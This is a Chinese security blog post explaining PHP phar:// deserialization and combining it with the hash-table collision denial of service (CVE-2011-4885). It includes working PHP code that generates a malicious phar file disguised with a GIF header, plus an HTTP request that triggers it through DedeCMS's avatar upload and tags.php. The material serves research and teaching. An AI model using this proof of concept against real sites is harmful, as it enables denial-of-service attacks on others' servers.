phar反序列化

暗月博客 2019年11月21日23:17:51评论510 views字数 2207阅读7分21秒阅读模式
摘要

phar反序列化 引言
在Blackhat2018,来自Secarma的安全研究员Sam Thomas讲述了一种攻击PHP应用的新
方式,利用这种方法可以在不使用unserialize()函数的情况下触发PHP反序列化漏洞 。
漏洞 原理
漏洞触发点在使用phar://协议读取文件的时候,文件内容会被解析成phar对象,然后phar
对象内的Metadata信息会被反序列化。其实这个漏洞点并不是第一次出现,早在
hitcon2017就被Orange大佬用来出CTF题了(见baby^h-master-php-2017)。
从PHP官方手册中我们可以看到Meta-data是用serialize()生成并保存在phar文件中的:

phar反序列化

引言
在Blackhat2018,来自Secarma的安全研究员Sam Thomas讲述了一种攻击PHP应用的新
方式,利用这种方法可以在不使用unserialize()函数的情况下触发PHP反序列化漏洞
漏洞原理
漏洞触发点在使用phar://协议读取文件的时候,文件内容会被解析成phar对象,然后phar
对象内的Metadata信息会被反序列化。其实这个漏洞点并不是第一次出现,早在
hitcon2017就被Orange大佬用来出CTF题了(见baby^h-master-php-2017)。
从PHP官方手册中我们可以看到Meta-data是用serialize()生成并保存在phar文件中的:
phar反序列化

跟进PHP内核可以看到,当内核调用phar_parse_metadata()解析metadata数据时,会调
用php_var_unserialize()对其进行反序列化操作,因此会造成反序列化漏洞。
phar反序列化

漏洞利用
在Sam Thomas的举出的例子中可以看到,该漏洞主要通过利用魔术方法__destruct或
__wakeup构造利用链,但是在实战环境里往往较难找到可以直接通过魔术方法触发的漏洞
点。
由于通过反序列化可以产生任意一种数据类型,因此我想到了PHP的一个很古老的漏洞:
PHP内核哈希表碰撞攻击(CVE-2011-4885)。在PHP内核中,数组是以哈希表的方式实
现的,攻击者可以通过巧妙的构造数组元素的key使哈希表退化成单链表(时间复杂度从
O(1) => O(n))来触发拒绝服务攻击。
phar反序列化

PHP修复此漏洞的方式是限制通过$_GET或$_POST等方式传入的参数数量,但是如果PHP
脚本通过json_decode()或unserialize()等方式获取参数,依然将受到此漏洞的威胁。
接下来的漏洞利用思路就很明显了:构造一串恶意的serialize数据(能够触发哈希表拒绝服
务攻击),然后将其保存到phar文件的metadata数据区,当文件操作函数通过phar://协议
对其进行操作的时候就会触发拒绝服务攻击漏洞!
我们可以通过如下代码生成一个恶意的phar文件:

<?php set_time_limit(0); $size= pow(2, 16); $array = array(); for ($key = 0, $maxKey = ($size - 1) * $size; $key <= $maxKey; $key += $size) {    $array[$key] = 0; } $new_obj = new stdClass; $new_obj->hacker = $array; $p = new Phar(__DIR__ . '/avatar.phar', 0); $p['hacker.php'] = '<?php ?>'; $p->setMetadata($new_obj); $p->setStub('GIF<?php __HALT_COMPILER();?>');

然后通过如下代码测试拒绝服务攻击效果:

<?php set_time_limit(0); $startTime = microtime(true); file_exists("phar://avatar.phar"); $endTime = microtime(true); echo '执行时间: '.($endTime - $startTime). ' 秒';

在我的机器上的测试效果:

phar反序列化

漏洞实例复现
这里我要利用DedeCMS一个很出名的漏洞点,这个漏洞最初被用于探测后台目录,之后
在“巅峰极客”比赛中被当做SSRF攻击利用,现在我要利用这个漏洞点构造phar反序列化
来产生拒绝服务攻击!
首先通过织梦的头像上传点来上传phar文件(avatar.jpg)
文件位置: /member/edit_face.php

phar反序列化

由于DedeCMS默认的上传文件大小被限制为50K,所以我们要修改一下配置文件:
找到dataconfig.cache.inc.php,
把$cfg_max_face修改为5000
phar反序列化

上传成功后就会显示出文件的相对路径,然后直接构造如下数据包即可验证漏洞:

POST /uploads/tags.php HTTP/1.1 Host: 127.0.0.1 Content-Type: application/x-www-form-urlencode Content-Length: 136    dopost=save&_FILES[lsa][tmp_name]=phar://uploads/userup/3/myface.jpg&_FILES[lsa]

参考
[1]https://www.lorexxar.cn/2017/11/10/hitcon2017-writeup/
[2]http://php.net/manual/en/book.phar.php
[3]https://blog.ripstech.com/2018/new-php-exploitation-technique/
[4]http://www.laruence.com/2011/12/30/2435.html
[5]https://raw.githubusercontent.com/s-n-t/presentations/master/us-18-Thomas-
It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日23:17:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   phar反序列化http://cn-sec.com/archives/73789.html

发表评论

匿名网友 填写信息